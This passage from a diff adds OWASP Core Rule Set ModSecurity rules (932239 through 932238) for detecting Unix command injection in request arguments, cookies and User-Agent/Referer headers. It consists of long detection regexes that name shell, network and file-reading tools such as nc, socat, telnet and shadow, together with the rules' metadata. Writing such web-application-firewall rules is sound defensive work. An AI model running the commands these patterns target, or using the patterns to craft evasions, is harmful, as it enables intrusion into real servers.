\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:c|a(?:ll|tch)[\s\v&\)<>\|]|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932239,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection found in user-agent or referer header',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. +# +# Rule relations: +# +# .932160 (base rule, PL1, unix shell commands with full path) +# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers) +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-shell.data" \ + "id:932161,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + commans that are prone to false positive detection at PL3. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932232.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932232 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))\b" \ + "id:932232,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932237.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932237 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:(?:itude)?[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|n?f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|ed|ftp|ql)?|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:ew)?[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|diff)|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:[\s\v&\)<>c\|]|h(?:o(?:[\s\v&\)<>\|]|ami|is)?|iptail[\s\v&\)<>\|])|a(?:ll|tch)[\s\v&\)<>\|]|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))(?:\b|[^0-9A-Z_a-z])" \ + "id:932237,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932238.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932238 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o|[\s\v&\),<>\|].*))" \ + "id:932238,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + 